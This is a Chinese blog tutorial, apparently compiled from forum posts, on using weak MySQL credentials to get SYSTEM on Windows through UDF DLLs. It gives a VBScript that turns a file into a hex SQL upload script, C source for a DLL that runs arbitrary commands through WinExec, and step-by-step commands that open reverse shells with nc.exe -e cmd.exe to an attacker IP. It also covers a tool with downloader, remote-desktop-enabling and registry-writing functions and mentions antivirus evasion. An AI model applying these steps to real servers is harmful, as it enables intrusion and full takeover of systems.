利用MYSQL提升权限

  • A+
所属分类:网络安全

<参考:

http://cooworld.blog.163.com/blog/static/12950189520099225159577/

http://blog.csdn.net/linkboy2004/article/details/3818272

>

早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到! 

首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。 

思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦! 
下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法): 
set @a = concat('',0x0123abc1312389…..); 
set @a = concat(@a,0x4658978abc545e……); 
…………………. 

create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob 
insert into Mix values("");update Mix set data = @a;//@a插入表Mix 
select data from Mix into DUMPFILE 'C://Winnt//文件名';//导出表中内容为文件 
前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。 

后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下: 
fp=wscript.arguments(0 
fn=right(fp,len(fp)-instrrev(fp,"/")) 
with createobject("adodb.stream") 
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str) 
end with 
sll=sl mod 65536:slh=sl/65536 
with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true) 
.write "set @a = concat('',0x" 
for i=1 to sl 
bt=ascb(midb(str,i,1)) 
if bt<16 then .write "0" 
.write hex(bt) 
if i mod 128=0 then .write ");"+vbcrlf+"set @a = concat(@a,0x" 
next 
end with 
好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set @a = concat('',0x”删除了,加上建表,插值得那三句代码即可! 

脚本生成了,如何上传?先登陆mysql服务器: 
C:/>mysql –u root –h hostip –p 
Mysql>use mysql; //先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库 
Mysql>/. E:/*.dll.txt; //这儿就是你生成的mysql脚本 
按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了! 

下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧! 
先用mix.dll: 
登陆mysql,输入命令: 
Mysql> /. e:/mix.dll.txt; 
Mysql> Create FUNCTION Mixconnect RETURNS STRING SONAME 'C://windows//mix.dll'; 
//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令! 
Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口 
过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1: 

这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select Mixconnect('你的ip','8080');”的时候,对方的mysql会当掉!报错,然后服务停止! 
所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。 
再用my_udf.dll: 
Mysql>/. C:/my_udf.dll.txt 
Mysql> Create FUNCTION my_udfdoor RETURNS STRING SONAME 'C://winnt//my_udf.dll'; 
//同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数 
Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数 
好了,现在你可以不用关这个shell了,我们再开一个cmd,使用: 
D:/>nc hostip 3306 

4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k” ,他是my_udfdoor默认密码,自己无法更改 
过一会儿,你就有了系统权限的shell了, 
由于他是hook recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select my_udfdoor('’);”后),不管你是否连接,只要执行了: 
Mysql>drop function my_udfdoor; 后,mysql也汇报错,然后挂掉, 

所以,你使用这个dll文件无法删除你的痕迹! 
最后,然我们自己写一个自定义的dll文件。看能不能解决问题。 

我们仅仅使用mysql 得udf的示例作模版即可!看他的示例: 
#i nclude <stdlib.h> 
#i nclude <winsock.h> 
#i nclude <mysql.h> 
extern "C" { 
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, 

char *error); 
// 兼容C 

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, 

char *error) 

char * me = "my name"; 
return me; 
// 调用此UDF将返回 my name 

十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了: 
下面是我的一个哥们Crackme是修改的: 
#i nclude <stdlib.h> 
#i nclude <windows.h> 
#i nclude "mysql.h" 
extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改 
__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改! 

char me[256] = {0}; 
if (args->arg_count == 1){ 
strncpy(me,args->args[0],args->lengths[0]); 
me[args->lengths[0]]='/0'; 
WinExec(me,SW_HIDE); //就是用它来执行任意命令 
}else 
strcpy(me,"do nonthing./n"); 
return me; 

好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把! 
看操作: 
Mysql>/. C:/sysudf.dll.txt 
Mysql>Create function sys_name returns string soname 'C://windows//sysudf.dll'; 
Mysql>/. Nc.exe.txt //把nc.exe也上传上去 
Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080'); 
//sys_name参数只有一个,参数指定要执行的系统命令 
好,看看在Win2003中的一个反弹shell了, 
当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。 

上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

 

 

 

一、功能:利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。

二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。

三、使用帮助:
第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。

第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到”No paths allowed for shared library”错误。

第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到”Can't open shared library”错误,这时你必须将DLL重新导出到系统目录。

第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。

第五步:使用完成后你可能需要删除在第二步中导出的DLL,但在删除DLL前请先删除你在第三步中创建的函数,否则删除操作将失败,删除第三步中创建的函数的SQL语句为:drop function 创建的函数名。
图5

四、功能函数说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;

——————————————————–

引用第13楼编程king于2006-10-25 02:01发表的:
看了楼主的文章后,我拿了台服务器来做实验,mysql的权限是root用户连接的,mysql的版本是5.0的,那就是要说把udf.dll导出到系统目录下了,因为mysql是5.0版的,第一步要:c:/windows/udf.dll或者c:/windows/system32/udf.ll这样哪?再或者c:/windows、c:/windows/system32 ,我这样尝试的时候是都成功了,但是到了第二步,却出现搂主说的No paths allowed for shared library,再导出到系统目录里的时候已经错误了,本身已经有过了,我又尝试把udf.dll改成别的dll文件,还是不行,这里我就不明白了,
windows和system32的目录下都有udf.dll这个文件,为什么还是错误?是因为第一次导出的时候错误了?还是格式不对?或者是我人品有问题?等待楼主的解答。。。。。

哈哈,可能我写的不足够明白:“如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行”

你只要导出一次,比如你已经导到了c:/windows目录。你就可以执行Create function cmdshell returns string soname 'udf.dll';

后面的DLL就不用带路径了,导到系统目录就是会了可以让程序不带路径就能找到udf.dll。

QUOTE:
我执行了:Create Function returns string soname 'udf.dll'时 数据库查讯出错,请检查SQL语句Create Function returns string soname 'udf.dll'的语法是否正确。You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'string soname 'udf.dll'' at line 1

兄弟忘了写函数名:你可以试试:Create Function cmdshell returns string soname 'udf.dll';

QUOTE:
3389 开不了 select open3389('3389') 语法没错吧! 顺求 其他函数的使用方法!

程序中用到了一个通用开3389程序组件,而这个程序是我从网上下载的,再做了一下免杀处理而已,对这个开3389程序本身我也不是很清楚,不过我试了好几个版本的虚拟机,觉得成功率是我能下到的此类程序中最好的,就把它作为一个资源导入到了我的DLL中,对你这个问题我也不知道什么原因,如果朋友有更好的开3389程序,我可以改进一下。

QUOTE:
测试时发生下面错误! Fatal error: Maximum execution time of 30 seconds exceeded in C:AppServwwwudf.php on line 91

排除服务器的性能问题外,可能是服务器上杀毒软件的原因

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: